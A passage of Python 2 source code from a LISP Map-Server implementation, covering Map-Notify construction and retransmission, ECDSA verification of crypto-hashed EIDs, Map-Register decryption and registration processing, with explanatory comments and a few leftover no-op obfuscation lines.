    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return

if 38 - 38: oO0o * I11i % OOooOOo
if 80 - 80: O0 % II111iiii / O0 . Oo0Ooo * OoOoOO00 + OOooOOo
if 47 - 47: Ii1I - Oo0Ooo * OoOoOO00
if 20 - 20: oO0o
if 48 - 48: I1IiiI % OoO0O00
if 33 - 33: Ii1I
if 73 - 73: Ii1I . IiII
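# Every queued Map-Notify follows the same lifecycle: it is keyed by nonce
# in lisp_map_notify_queue, a threading.Timer re-invokes
# lisp_retransmit_map_notify() every LISP_MAP_NOTIFY_INTERVAL seconds, and
# the entry is dequeued when a Map-Notify-Ack arrives or after
# LISP_MAX_MAP_NOTIFY_RETRIES attempts.
#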
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
    eid_record):

    #
    # Encode the merged EID-record and its full registered RLOC-set once.
    #
    eid_record.rloc_count = len(parent.registered_rlocs)
    record_packet = eid_record.encode()
    eid_record.print_record("Merged Map-Notify ", False)

    for registered_rloc in parent.registered_rlocs:
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(registered_rloc)
        record_packet += rloc_record.encode()
        rloc_record.print_record("    ")
        del(rloc_record)

    #
    # Build and send an individual Map-Notify to each registered RLOC.
    #
    for registered_rloc in parent.registered_rlocs:
        dest = registered_rloc.rloc
        map_notify = lisp_map_notify(lisp_sockets)
        map_notify.record_count = 1
        key_id = map_register.key_id
        map_notify.key_id = key_id
        map_notify.alg_id = map_register.alg_id
        map_notify.auth_len = map_register.auth_len
        map_notify.nonce = map_register.nonce
        map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
        map_notify.etr.copy_address(dest)
        map_notify.etr_port = map_register.sport
        map_notify.site = parent.site
        packet = map_notify.encode(record_packet, parent.site.auth_key[key_id])
        map_notify.print_notify()

        #
        # Put the Map-Notify state on the retransmission queue, replacing
        # any older entry with the same nonce key.
        #
        key = map_notify.nonce_key
        if (lisp_map_notify_queue.has_key(key)):
            old_notify = lisp_map_notify_queue[key]
            old_notify.retransmit_timer.cancel()
            del(old_notify)
        lisp_map_notify_queue[key] = map_notify

        #
        # Send out the Map-Notify.
        #
        lprint("Send merged Map-Notify to ETR {}".format(red(dest.print_address(), False)))

        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
        parent.site.map_notifies_sent += 1

        #
        # Start the retransmit timer.
        #
        map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
            lisp_retransmit_map_notify, [map_notify])
        map_notify.retransmit_timer.start()
    return

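# The queue-then-arm pattern above is the one used throughout this file
# (sketch, assuming `mn` is an encoded and addressed lisp_map_notify):
#
#   lisp_map_notify_queue[mn.nonce_key] = mn
#   mn.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
#       lisp_retransmit_map_notify, [mn])
#   mn.retransmit_timer.start()
#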
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
    source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):

    key = lisp_hex_string(nonce) + source.print_address()

    #
    # Remove stale entries from the retransmission queue. If a Map-Notify
    # is already pending for this nonce/source, let it retransmit.
    #
    lisp_remove_eid_from_map_notify_queue(eid_list)
    if (lisp_map_notify_queue.has_key(key)):
        map_notify = lisp_map_notify_queue[key]
        addr_str = red(source.print_address_no_iid(), False)
        lprint("Map-Notify with nonce 0x{} pending for xTR {}".format(
            lisp_hex_string(map_notify.nonce), addr_str))
        return

    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = record_count
    map_notify.key_id = key_id
    map_notify.alg_id = alg_id
    map_notify.auth_len = auth_len
    map_notify.nonce = nonce
    map_notify.nonce_key = lisp_hex_string(nonce)
    map_notify.etr.copy_address(source)
    map_notify.etr_port = port
    map_notify.site = site
    map_notify.eid_list = eid_list

    #
    # Only unsolicited Map-Notifies (RLOC-set changes) are retransmitted,
    # so only those go on the retransmission queue.
    #
    if (map_register_ack == False):
        key = map_notify.nonce_key
        lisp_map_notify_queue[key] = map_notify

    if (map_register_ack):
        lprint("Send Map-Notify to ack Map-Register")
    else:
        lprint("Send Map-Notify for RLOC-set change")

    #
    # Encode the packet with authentication and print it.
    #
    packet = map_notify.encode(eid_records, site.auth_key[key_id])
    map_notify.print_notify()

    if (map_register_ack == False):
        eid_record = lisp_eid_record()
        eid_record.decode(eid_records)
        eid_record.print_record("  ", False)

    #
    # Send out the Map-Notify.
    #
    lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
    site.map_notifies_sent += 1

    if (map_register_ack): return

    #
    # Start the retransmit timer for the unsolicited Map-Notify.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return

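# Note the two cases above: a Map-Notify that acks a Map-Register is sent
# once and never queued, while an unsolicited Map-Notify for an RLOC-set
# change is queued under "<nonce-hex><source-address>" and retransmitted
# until the xTR acks it.
#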
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
    map_notify.map_notify_ack = True

    #
    # Encode the packet with authentication and print it.
    #
    packet = map_notify.encode(eid_records, ms.password)
    map_notify.print_notify()

    #
    # Send the Map-Notify-Ack to the Map-Server.
    #
    dest = ms.map_server
    lprint("Send Map-Notify-Ack to {}".format(
        red(dest.print_address(), False)))
    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    return

def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):

    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = 1
    map_notify.nonce = lisp_get_control_nonce()
    map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
    map_notify.etr.copy_address(xtr)
    map_notify.etr_port = LISP_CTRL_PORT
    map_notify.eid_list = eid_list
    key = map_notify.nonce_key

    #
    # Remove old state for these EIDs. If a Map-Notify is already pending
    # for this nonce, let the retransmission logic handle it.
    #
    lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
    if (lisp_map_notify_queue.has_key(key)):
        map_notify = lisp_map_notify_queue[key]
        lprint("Map-Notify with nonce 0x{} pending for ITR {}".format(
            map_notify.nonce, red(xtr.print_address_no_iid(), False)))
        return

    #
    # Put the Map-Notify state on the retransmission queue.
    #
    lisp_map_notify_queue[key] = map_notify

    #
    # If RTRs are registered, include only them in the RLOC-set, unless
    # the target xTR is itself one of the RTRs.
    #
    rtrs_exist = site_eid.rtrs_in_rloc_set()
    if (rtrs_exist):
        if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False

    #
    # Encode the EID-record for the (S,G) entry.
    #
    eid_record = lisp_eid_record()
    eid_record.record_ttl = 1440
    eid_record.eid.copy_address(site_eid.eid)
    eid_record.group.copy_address(site_eid.group)
    eid_record.rloc_count = 0
    for rloc_entry in site_eid.registered_rlocs:
        if (rtrs_exist ^ rloc_entry.is_rtr()): continue
        eid_record.rloc_count += 1
    packet = eid_record.encode()

    #
    # Print the contents of the Map-Notify.
    #
    map_notify.print_notify()
    eid_record.print_record("  ", False)

    #
    # Encode the RLOC-records, selecting RTRs or non-RTRs as decided above.
    #
    for rloc_entry in site_eid.registered_rlocs:
        if (rtrs_exist ^ rloc_entry.is_rtr()): continue
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(rloc_entry)
        packet += rloc_record.encode()
        rloc_record.print_record("    ")

    #
    # Encode the Map-Notify header; multicast Map-Notifies carry no
    # authentication data.
    #
    packet = map_notify.encode(packet, "")
    if (packet == None): return

    #
    # Send the Map-Notify and start the retransmit timer.
    #
    lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)

    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return

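# The XOR test "rtrs_exist ^ rloc_entry.is_rtr()" above keeps exactly one
# class of RLOC (illustrative truth table):
#
#   rtrs_exist  is_rtr()  xor    action
#   True        True      False  keep (RTRs registered, entry is an RTR)
#   True        False     True   skip
#   False       True      True   skip
#   False       False     False  keep (no RTRs, entry is a plain xTR)
#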
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
    null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)

    for eid_tuple in rle_list:
        site_eid = lisp_site_eid_lookup(eid_tuple[0], eid_tuple[1], True)
        if (site_eid == None): continue

        #
        # Get the current RLOC-set for the (S,G). If empty, merge in the
        # RTRs from each individual registration.
        #
        rloc_set = site_eid.registered_rlocs
        if (len(rloc_set) == 0):
            merged_rtrs = {}
            for individual in site_eid.individual_registrations.values():
                for rloc_entry in individual.registered_rlocs:
                    if (rloc_entry.is_rtr() == False): continue
                    merged_rtrs[rloc_entry.rloc.print_address()] = rloc_entry
            rloc_set = merged_rtrs.values()

        #
        # Build the list of xTRs to notify. For (0.0.0.0/0, G) entries,
        # notify the existing RLE-nodes; otherwise notify registered RTRs.
        #
        notify_list = []
        found_rtrs = False
        if (site_eid.eid.address == 0 and site_eid.eid.mask_len == 0):
            notify_str = []
            rle_nodes = []
            if (len(rloc_set) != 0 and rloc_set[0].rle != None):
                rle_nodes = rloc_set[0].rle.rle_nodes

            for rle_node in rle_nodes:
                notify_list.append(rle_node.address)
                notify_str.append(rle_node.address.print_address_no_iid())
            lprint("Notify existing RLE-nodes {}".format(notify_str))
        else:
            for rloc_entry in rloc_set:
                if (rloc_entry.is_rtr()): notify_list.append(rloc_entry.rloc)

        #
        # If no RTRs are registered, fall back to the ITRs that registered
        # the source EID.
        #
        found_rtrs = (len(notify_list) != 0)
        if (found_rtrs == False):
            source_site = lisp_site_eid_lookup(eid_tuple[0], null_group, False)
            if (source_site == None): continue

            for rloc_entry in source_site.registered_rlocs:
                if (rloc_entry.rloc.is_null()): continue
                notify_list.append(rloc_entry.rloc)

        #
        # No ITRs or RTRs found, suppress the Map-Notify.
        #
        if (len(notify_list) == 0):
            lprint("No ITRs or RTRs found for {}, Map-Notify suppressed".format(green(site_eid.print_eid_tuple(), False)))
            continue

        #
        # Send a multicast Map-Notify to each xTR in the list.
        #
        for xtr in notify_list:
            lprint("Build Map-Notify to {}TR {} for {}".format(
                "R" if found_rtrs else "x",
                red(xtr.print_address_no_iid(), False),
                green(site_eid.print_eid_tuple(), False)))

            eid_list = [site_eid.print_eid_tuple()]
            lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list,
                xtr)
            time.sleep(.001)
    return

def lisp_find_sig_in_rloc_set(packet, rloc_count):
    for i in range(rloc_count):
        rloc_record = lisp_rloc_record()
        packet = rloc_record.decode(packet, None)
        json_sig = rloc_record.json
        if (json_sig == None): continue

        try:
            json_sig = json.loads(json_sig.json_string)
        except:
            lprint("Found corrupted JSON signature")
            continue

        if (json_sig.has_key("signature") == False): continue
        return(rloc_record)
    return(None)

def lisp_get_eid_hash(eid):
    hash_mask_len = None
    for eid_prefix in lisp_eid_hashes:

        #
        # An instance-id of -1 is a wildcard that matches any instance-id.
        #
        iid = eid_prefix.instance_id
        if (iid == -1): eid_prefix.instance_id = eid.instance_id

        more_specific = eid.is_more_specific(eid_prefix)
        eid_prefix.instance_id = iid
        if (more_specific):
            hash_mask_len = 128 - eid_prefix.mask_len
            break

    if (hash_mask_len == None): return(None)

    #
    # Extract the low-order hash bits, 16 at a time, into an IPv6-style
    # string. Addresses are Python longs, so hex() produces a trailing "L"
    # that the [2:-1] slice strips along with the "0x" prefix.
    #
    address = eid.address
    eid_hash = ""
    for i in range(0, hash_mask_len / 16):
        quad = address & 0xffff
        quad = hex(quad)[2:-1]
        eid_hash = quad.zfill(4) + ":" + eid_hash
        address >>= 16

    if (hash_mask_len % 16 != 0):
        quad = address & 0xff
        quad = hex(quad)[2:-1]
        eid_hash = quad.zfill(2) + ":" + eid_hash

    return(eid_hash[0:-1])

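# Worked example (editor's illustration): with a crypto-EID prefix of
# fd00::/64 configured in lisp_eid_hashes, hash_mask_len is 128 - 64 = 64,
# so for EID fd00::1111:2222:3333:4444 the loop walks the low-order 64
# bits 16 at a time and returns "1111:2222:3333:4444".
#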
def lisp_lookup_public_key(eid):
    iid = eid.instance_id

    #
    # Build "hash-<hash>" distinguished-name EID from the crypto-EID so a
    # mapping system lookup can be done on it.
    #
    eid_hash = lisp_get_eid_hash(eid)
    if (eid_hash == None): return([None, None, False])

    eid_hash = "hash-" + eid_hash
    hash_eid = lisp_address(LISP_AFI_NAME, eid_hash, len(eid_hash), iid)
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)

    #
    # Do the lookup in the site cache.
    #
    site_eid = lisp_site_eid_lookup(hash_eid, group, True)
    if (site_eid == None): return([hash_eid, None, False])

    #
    # Find "public-key" in the JSON string of any RLOC-record in the
    # registered RLOC-set.
    #
    pubkey = None
    for rloc in site_eid.registered_rlocs:
        json_pubkey = rloc.json
        if (json_pubkey == None): continue
        try:
            json_pubkey = json.loads(json_pubkey.json_string)
        except:
            lprint("Registered RLOC JSON format is invalid for {}".format(eid_hash))
            return([hash_eid, None, False])

        if (json_pubkey.has_key("public-key") == False): continue
        pubkey = json_pubkey["public-key"]
        break
    return([hash_eid, pubkey, True])

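# The lookup key is a distinguished-name EID such as
# "hash-1111:2222:3333:4444" in the EID's instance-id; any RLOC-record of
# that registration may carry JSON of the form
# {"public-key": "<base64-encoded PEM>"}, consumed below by
# lisp_verify_cga_sig().
#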
def lisp_verify_cga_sig(eid, rloc_record):

    #
    # Get the signature and signature-EID from the JSON string stored in
    # the RLOC-record.
    #
    sig_json = json.loads(rloc_record.json.json_string)

    if (lisp_get_eid_hash(eid)):
        sig_eid = eid
    elif (sig_json.has_key("signature-eid")):
        sig_eid_str = sig_json["signature-eid"]
        sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
    else:
        lprint("  No signature-eid found in RLOC-record")
        return(False)

    #
    # Look up the public key registered for the crypto-hashed EID.
    #
    hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
    if (hash_eid == None):
        eid_str = green(sig_eid.print_address(), False)
        lprint("  Could not parse hash in EID {}".format(eid_str))
        return(False)

    found = "found" if lookup_good else bold("not found", False)
    eid_str = green(hash_eid.print_address(), False)
    lprint("  Lookup for crypto-hashed EID {} {}".format(eid_str, found))
    if (lookup_good == False): return(False)

    if (pubkey == None):
        lprint("  RLOC-record with public-key not found")
        return(False)

    pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
    lprint("  RLOC-record with public-key '{}' found".format(pubkey_str))

    #
    # Base64 decode the signature and sanity check its length.
    #
    sig_str = sig_json["signature"]

    try:
        sig = binascii.a2b_base64(sig_str)
    except:
        lprint("  Incorrect padding in signature string")
        return(False)

    sig_len = len(sig)
    if (sig_len & 1):
        lprint("  Signature length is odd, length {}".format(sig_len))
        return(False)

    #
    # The signed data is the printed signature-EID address string.
    #
    sig_data = sig_eid.print_address()

    #
    # Verify the signature with the base64-decoded, PEM-formatted public
    # key.
    #
    pubkey = binascii.a2b_base64(pubkey)
    try:
        key = ecdsa.VerifyingKey.from_pem(pubkey)
    except:
        bad = bold("Bad public-key", False)
        lprint("  {}, not in PEM format".format(bad))
        return(False)

    try:
        good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
    except:
        lprint("  Signature library failed for signature data '{}'".format(sig_data))
        lprint("  Signature used '{}'".format(sig_str))
        return(False)

    return(good)

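# Standalone sketch of the verification primitive (editor's illustration,
# using the same python-ecdsa package this file already relies on):
#
#   vk = ecdsa.VerifyingKey.from_pem(binascii.a2b_base64(b64_pem_pubkey))
#   try:
#       ok = vk.verify(raw_sig, signed_data, hashfunc=hashlib.sha256)
#   except ecdsa.BadSignatureError:
#       ok = False
#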
def lisp_remove_eid_from_map_notify_queue(eid_list):

    #
    # Find the nonce keys of queue entries that contain any EID from the
    # supplied list, cancel their timers, then dequeue them.
    #
    keys_to_remove = []
    for eid_tuple in eid_list:
        for key in lisp_map_notify_queue:
            map_notify = lisp_map_notify_queue[key]
            if (eid_tuple not in map_notify.eid_list): continue

            keys_to_remove.append(key)
            timer = map_notify.retransmit_timer
            if (timer): timer.cancel()

            lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".format(map_notify.nonce_key, green(eid_tuple, False)))

    for key in keys_to_remove: lisp_map_notify_queue.pop(key)
    return

def lisp_decrypt_map_register(packet):

    #
    # Check the encryption bit (e-bit) in the first longword of the
    # header. If it is clear, the Map-Register is in plaintext.
    #
    header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    e_bit = (header >> 13) & 0x1
    if (e_bit == 0): return(packet)

    ekey_id = (header >> 14) & 0x7

    #
    # Look up the configured decryption key for this key-id.
    #
    try:
        ekey = lisp_ms_encryption_keys[ekey_id]
        ekey = ekey.zfill(32)
        iv = "0" * 8
    except:
        lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
        return(None)

    decrypt_str = bold("Decrypt", False)
    lprint("{} Map-Register with key-id {}".format(decrypt_str, ekey_id))

    plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
    return(packet[0:4] + plaintext)

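# Header layout assumed above (first longword, network byte order): bit 13
# is the e-bit marking an encrypted payload and bits 14-16 carry a 3-bit
# key-id into lisp_ms_encryption_keys. Only the bytes after the 4-byte
# header are ChaCha-encrypted, with the key zero-filled to 32 bytes and a
# fixed 8-byte "00000000" nonce.
#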
def lisp_process_map_register(lisp_sockets, packet, source, sport):
    global lisp_registered_count

    #
    # Decrypt the Map-Register if the e-bit is set.
    #
    packet = lisp_decrypt_map_register(packet)
    if (packet == None): return

    map_register = lisp_map_register()
    orig_packet, packet = map_register.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Register packet")
        return

    map_register.sport = sport

    map_register.print_map_register()

    #
    # Remember whether SHA-1 or SHA-2 was used for the authentication hash.
    #
    sha1_or_sha2 = True
    if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
        sha1_or_sha2 = True
    if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
        sha1_or_sha2 = False

    #
    # For multicast entries whose RLOC-set changed, collect (S,G) tuples
    # so a multicast Map-Notify can be queued at the end.
    #
    multicast_notify_list = []

    site = None
    eid_records = packet
    eids_registered = []
    record_count = map_register.record_count
    for i in range(record_count):
        eid_record = lisp_eid_record()
        rloc_record = lisp_rloc_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Register packet")
            return
        eid_record.print_record("  ", False)

        #
        # Longest-match the site cache for the registering EID-prefix.
        #
        site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
            False)

        non_ams_str = site_eid.print_eid_tuple() if site_eid else None

        #
        # If the matched entry does not accept more-specifics and the
        # registration is not an exact match, back up to a parent entry
        # that does accept more-specifics.
        #
        if (site_eid and site_eid.accept_more_specifics == False):
            if (site_eid.eid_record_matches(eid_record) == False):
                parent = site_eid.parent_for_more_specifics
                if (parent): site_eid = parent

        #
        # If an accept-more-specifics entry matched, create a dynamic
        # site-eid for the more-specific prefix; otherwise redo the lookup
        # as an exact match.
        #
        ams = (site_eid and site_eid.accept_more_specifics)
        if (ams):
            ms_site_eid = lisp_site_eid(site_eid.site)
            ms_site_eid.dynamic = True
            ms_site_eid.eid.copy_address(eid_record.eid)
            ms_site_eid.group.copy_address(eid_record.group)
            ms_site_eid.parent_for_more_specifics = site_eid
            ms_site_eid.add_cache()
            ms_site_eid.inherit_from_ams_parent()
            site_eid.more_specific_registrations.append(ms_site_eid)
            site_eid = ms_site_eid
        else:
            site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
                True)

        eid_str = eid_record.print_eid_tuple()

        if (site_eid == None):
            not_found = bold("Site not found", False)
            lprint("  {} for EID {}{}".format(not_found, green(eid_str, False),
                ", matched non-ams {}".format(green(non_ams_str, False)) if
                non_ams_str else ""))

            #
            # Skip over the RLOC-records of the unknown EID-record.
            #
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            if (packet == None):
                lprint("  Could not decode RLOC-record in Map-Register packet")
                return
            continue

        site = site_eid.site

        if (ams):
            parent_str = site_eid.parent_for_more_specifics.print_eid_tuple()
            lprint("  Found ams {} for site '{}' for registering prefix {}".format(green(parent_str, False), site.site_name,
                green(eid_str, False)))
        else:
            found_str = green(site_eid.print_eid_tuple(), False)
            lprint("  Found {} for site '{}' for registering prefix {}".format(found_str, site.site_name, green(eid_str, False)))

        #
        # Reject the registration if the site is in admin-shutdown state.
        #
        if (site.shutdown):
            lprint(("  Rejecting registration for site '{}', configured in " +
                "admin-shutdown state").format(site.site_name))
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            continue

        #
        # Verify authentication with the password configured for the
        # key-id supplied in the Map-Register.
        #
        key_id = map_register.key_id
        if (site.auth_key.has_key(key_id)):
            password = site.auth_key[key_id]
        else:
            password = ""

        auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
            map_register.auth_data, password)
        dynamic = "dynamic " if site_eid.dynamic else ""

        passfail = bold("passed" if auth_good else "failed", False)
        key_id_str = "key-id {}".format(key_id) if key_id == \
            map_register.key_id else "bad key-id {}".format(map_register.key_id)
        lprint("  Authentication {} for {}EID-prefix {}, {}".format(passfail,
            dynamic, green(eid_str, False), key_id_str))

        #
        # For crypto-EIDs (and sites requiring signatures), verify the
        # ECDSA signature carried in an RLOC-record.
        #
        sig_good = True
        is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
        if (is_crypto_eid or site_eid.require_signature):
            required = "Required " if site_eid.require_signature else ""
            green_eid = green(eid_str, False)
            sig_rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
            if (sig_rloc == None):
                sig_good = False
                lprint(("  {}EID-crypto-hash signature verification {} " +
                    "for EID-prefix {}, no signature found").format(required,
                    bold("failed", False), green_eid))
            else:
                sig_good = lisp_verify_cga_sig(eid_record.eid, sig_rloc)
                passfail = bold("passed" if sig_good else "failed", False)
                lprint(("  {}EID-crypto-hash signature verification {} " +
                    "for EID-prefix {}").format(required, passfail, green_eid))

        if (auth_good == False or sig_good == False):
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            if (packet == None):
                lprint("  Could not decode RLOC-record in Map-Register packet")
                return
            continue

        #
        # For merged registrations, keep per-xTR state in individual
        # registrations keyed by (source address, xtr-id).
        #
        if (map_register.merge_register_requested):
            parent = site_eid
            parent.inconsistent_registration = False

            #
            # Clear merged state if the site-id changed for a unicast
            # registration.
            #
            if (site_eid.group.is_null()):
                if (parent.site_id != map_register.site_id):
                    parent.site_id = map_register.site_id
                    parent.registered = False
                    parent.individual_registrations = {}
                    parent.registered_rlocs = []
                    lisp_registered_count -= 1

            key = source.address + map_register.xtr_id
            if (site_eid.individual_registrations.has_key(key)):
                site_eid = site_eid.individual_registrations[key]
            else:
                site_eid = lisp_site_eid(site)
                site_eid.eid.copy_address(parent.eid)
                site_eid.group.copy_address(parent.group)
                site_eid.encrypt_json = parent.encrypt_json
                parent.individual_registrations[key] = site_eid
        else:
            site_eid.inconsistent_registration = \
                site_eid.merge_register_requested

        site_eid.map_registers_received += 1

        #
        # Ignore a deregistration (TTL 0) from an RLOC that is not in the
        # currently registered RLOC-set.
        #
        bad_source = (site_eid.is_rloc_in_rloc_set(source) == False)
        if (eid_record.record_ttl == 0 and bad_source):
            lprint("  Ignore deregistration request from {}".format(red(source.print_address_no_iid(), False)))
            continue

        #
        # Save the old RLOC-set and build a new one from the RLOC-records.
        #
        old_rloc_set = site_eid.registered_rlocs
        site_eid.registered_rlocs = []

        start_rloc_records = packet
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
            if (packet == None):
                lprint("  Could not decode RLOC-record in Map-Register packet")
                return
            rloc_record.print_record("    ")

            #
            # Reject the registration if this site restricts RLOCs to a
            # configured allowed set.
            #
            if (len(site.allowed_rlocs) > 0):
                addr_str = rloc_record.rloc.print_address()
                if (site.allowed_rlocs.has_key(addr_str) == False):
                    lprint(("  Reject registration, RLOC {} not " +
                        "configured in allowed RLOC-set").format(red(addr_str,
                        False)))

                    site_eid.registered = False
                    packet = rloc_record.end_of_rlocs(packet,
                        eid_record.rloc_count - j - 1)
                    break

            #
            # Store the RLOC in the registered RLOC-set.
            #
            rloc = lisp_rloc()
            rloc.store_rloc_from_record(rloc_record, None, source)

            #
            # If the registering xTR is in the RLOC-set, remember whether
            # it wants Map-Notifies when the RLOC-set changes.
            #
            if (source.is_exact_match(rloc.rloc)):
                rloc.map_notify_requested = map_register.map_notify_requested

            site_eid.registered_rlocs.append(rloc)

        rloc_set_changed = (site_eid.do_rloc_sets_match(old_rloc_set) == False)

        #
        # A refresh registration must not change the RLOC-set.
        #
        if (map_register.map_register_refresh and rloc_set_changed and
            site_eid.registered):
            lprint("  Reject registration, refreshes cannot change RLOC-set")
            site_eid.registered_rlocs = old_rloc_set
            continue

        #
        # Timestamp the registration.
        #
        if (site_eid.registered == False):
            site_eid.first_registered = lisp_get_timestamp()
            lisp_registered_count += 1

        site_eid.last_registered = lisp_get_timestamp()
        site_eid.registered = (eid_record.record_ttl != 0)
        site_eid.last_registerer = source

        #
        # Store flags and parameters from the Map-Register message.
        #
        site_eid.auth_sha1_or_sha2 = sha1_or_sha2
        site_eid.proxy_reply_requested = map_register.proxy_reply_requested
        site_eid.lisp_sec_present = map_register.lisp_sec_present
        site_eid.map_notify_requested = map_register.map_notify_requested
        site_eid.mobile_node_requested = map_register.mobile_node
        site_eid.merge_register_requested = \
            map_register.merge_register_requested

        site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
        if (site_eid.use_register_ttl_requested):
            site_eid.register_ttl = eid_record.store_ttl()
        else:
            site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3

        site_eid.xtr_id_present = map_register.xtr_id_present
        if (site_eid.xtr_id_present):
            site_eid.xtr_id = map_register.xtr_id
            site_eid.site_id = map_register.site_id

        #
        # Merge this registration into the parent entry and, if requested,
        # send a merged Map-Notify right away.
        #
        if (map_register.merge_register_requested):
            if (parent.merge_in_site_eid(site_eid)):
                multicast_notify_list.append([eid_record.eid,
                    eid_record.group])
            if (map_register.map_notify_requested):
                lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
                    eid_record)

        if (rloc_set_changed == False): continue
        if (len(multicast_notify_list) != 0): continue

        eids_registered.append(site_eid.print_eid_tuple())

        #
        # The RLOC-set changed; Map-Notify the members of the old RLOC-set
        # that asked for it.
        #
        eid_record_packet = eid_record.encode() + start_rloc_records
        eid_list = [site_eid.print_eid_tuple()]
        lprint("  Changed RLOC-set, Map-Notifying old RLOC-set")

        for rloc in old_rloc_set:
            if (rloc.map_notify_requested == False): continue
            if (rloc.rloc.is_exact_match(source)): continue
            lisp_build_map_notify(lisp_sockets, eid_record_packet, eid_list,
                1, rloc.rloc, LISP_CTRL_PORT, map_register.nonce,
                map_register.key_id, map_register.alg_id,
                map_register.auth_len, site, False)

        #
        # Tell subscribers about the changed RLOC-set.
        #
        lisp_notify_subscribers(lisp_sockets, eid_record_packet, site_eid.eid,
            site)

    #
    # Queue multicast Map-Notifies for changed (S,G) RLOC-sets.
    #
    if (len(multicast_notify_list) != 0):
        lisp_queue_multicast_map_notify(lisp_sockets, multicast_notify_list)

    #
    # Merged registrations were Map-Notified individually above.
    #
    if (map_register.merge_register_requested): return

    #
    # Ack the Map-Register with a Map-Notify if requested.
    #
    if (map_register.map_notify_requested and site != None):
        lisp_build_map_notify(lisp_sockets, eid_records, eids_registered,
            map_register.record_count, source, sport, map_register.nonce,
            map_register.key_id, map_register.alg_id, map_register.auth_len,
            site, True)
    return

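# Processing summary (editor's note): for each EID-record the Map-Server
# (1) longest-matches the site cache, honoring accept-more-specifics,
# (2) verifies HMAC authentication and, for crypto-EIDs, the ECDSA
# signature, (3) rebuilds the registered RLOC-set, and (4) Map-Notifies
# the old RLOC-set, subscribers, and multicast receivers as needed.
#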
def lisp_process_multicast_map_notify(packet, source):
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify packet")
        return

    map_notify.print_notify()
    if (map_notify.record_count == 0): return

    eid_records = map_notify.eid_records

    for i in range(map_notify.record_count):
        eid_record = lisp_eid_record()
        eid_records = eid_record.decode(eid_records)
        if (eid_records == None): return
        eid_record.print_record("  ", False)

        #
        # Find the (S,G) entry in the map-cache; create a new entry if
        # gleaning is allowed for it.
        #
        mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
        if (mc == None):
            allow, rloc_probe, igmp = lisp_allow_gleaning(eid_record.eid,
                eid_record.group, None)
            if (allow == False): continue

            mc = lisp_mapping(eid_record.eid, eid_record.group, [])
            mc.add_cache()

        #
        # Gleaned map-cache entries are managed by the data-plane gleaning
        # logic, not by Map-Notify messages.
        #
        if (mc.gleaned):
            lprint("Ignore Map-Notify for gleaned {}".format(green(mc.print_eid_tuple(), False)))
            continue

        mc.mapping_source = None if source == "lisp-etr" else source
        mc.map_cache_ttl = eid_record.store_ttl()

        #
        # If the Map-Notify carries no RLOCs, flush the cached RLOC-set.
        #
        if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
            mc.rloc_set = []
            mc.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, mc)
            lprint("Update {} map-cache entry with no RLOC-set".format(green(mc.print_eid_tuple(), False)))
            continue

        rtrs_in_set = mc.rtrs_in_rloc_set()

        #
        # Process each RLOC-record; only (S,G) records that carry an RLE
        # are stored.
        #
        for j in range(eid_record.rloc_count):
